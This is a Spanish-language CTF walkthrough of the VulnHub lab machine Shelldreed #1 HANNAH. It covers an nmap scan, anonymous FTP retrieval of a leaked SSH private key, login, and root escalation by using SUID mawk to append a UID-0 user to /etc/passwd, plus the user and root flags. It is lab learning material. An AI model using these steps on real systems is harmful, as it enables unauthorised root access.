LaCashita!

[VULNHUB] Shelldreed #1 HANNAH

Hoy vamos a hackear la maquina de Vulnhub llamada Shelldreed #1 HANNAH. Podeis descargarla desde el siguiente enlace: HANNAH

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.


~ > nmap -A -p- 192.168.1.108                                                 
                                                                               
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-08 10:58 CEST
Nmap scan report for 192.168.1.108
Host is up (0.00035s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.59
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
61000/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 59:2d:21:0c:2f:af:9d:5a:7b:3e:a4:27:aa:37:89:08 (RSA)
|   256 59:26:da:44:3b:97:d2:30:b1:9b:9b:02:74:8b:87:58 (ECDSA)
|_  256 8e:ad:10:4f:e3:3e:65:28:40:cb:5b:bf:1d:24:7f:17 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.95 seconds

Despues de escanear los puertos vemos que solo tiene el servicio FTP y el SSH. Nos conectamos al FTP usando anonymous/anonymous para ver que encontramos...


~ > ftp 192.168.1.108                                                         
Connected to 192.168.1.108.
220 (vsFTPd 3.0.3)
Name (192.168.1.108:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 0        115          4096 Aug 06 16:56 .
drwxr-xr-x    3 0        115          4096 Aug 06 16:56 ..
drwxr-xr-x    2 0        0            4096 Aug 06 16:54 .hannah
226 Directory send OK.
ftp> 
ftp> cd .hannah
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Aug 06 16:54 .
drwxr-xr-x    3 0        115          4096 Aug 06 16:56 ..
-rwxr-xr-x    1 0        0            1823 Aug 06 16:54 id_rsa
226 Directory send OK.

Vemos que dentro de .hannah hay un fichero id_rsa. Lo descargamos.


ftp> get id_rsa
local: id_rsa remote: id_rsa
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for id_rsa (1823 bytes).
226 Transfer complete.
1823 bytes received in 0.00 secs (1.6495 MB/s)

Tiene pinta de ser una key ssh, asi que probamos a loguearnos como hannah usando dicha key.


~ > chmod 600 id_rsa
~ > ssh hannah@192.168.1.108 -i id_rsa -p 61000
The authenticity of host '[192.168.1.108]:61000 ([192.168.1.108]:61000)' can't 
be established.
ECDSA key fingerprint is SHA256:ceHZU8u3GwiQwVwrN4Ci830AmTvAmIUOlLjtVYcP2KM.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.1.108]:61000' (ECDSA) to the list of known 
hosts.
Linux ShellDredd 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep  5 09:20:42 2020 from 192.168.1.140
hannah@ShellDredd:~$

Estamos dentro :)

user.txt


hannah@ShellDredd:~$ ls
user.txt
hannah@ShellDredd:~$ cat user.txt
Gr3mMhbCpuwxCZorqDL3ILPn

Privilege Escalation

Exploramos el sistema para ver si vemos algun binario SUID que pueda ayudarnos con la escalada de privilegios.


hannah@ShellDredd:~$ find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/cpulimit
/usr/bin/mount
/usr/bin/passwd

Vemos que esta "mawk" el cual podemos utilizar.... Vamos a crear un usuario en el fichero /etc/passwd con permisos de root, con ayuda de mawk. La password que usara nuestro usuario es "123", asi que preparamos su hash para ponerlo en nuestro fichero.


~ > openssl passwd -1 -salt new 123
$1$new$p7ptkEKU1HnaHpRtzNizS1

Una vez tenemos la password que queremos utilizar, utilizamos mawk para agregar al fichero /etc/passwd una linea con el usuario que tendra privilegios de root y que utilizaremos!


hannah@ShellDredd:~$ mawk -v LFILE=/etc/passwd 'BEGIN { print 
"ruut:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash" >> LFILE }'

Tras ejecutar el comando, ya podemos loguearnos como "ruut".


hannah@ShellDredd:~$ su ruut
Password:123 
root@ShellDredd:/home/hannah#

Y ya somos root!

root.txt


root@ShellDredd:/home/hannah# cd /root
root@ShellDredd:~# ls
root.txt
root@ShellDredd:~# cat root.txt 
yeZCB44MPH2KQwbssgTQ2Nof

End

Y con esto ya seriamos root de la maquina.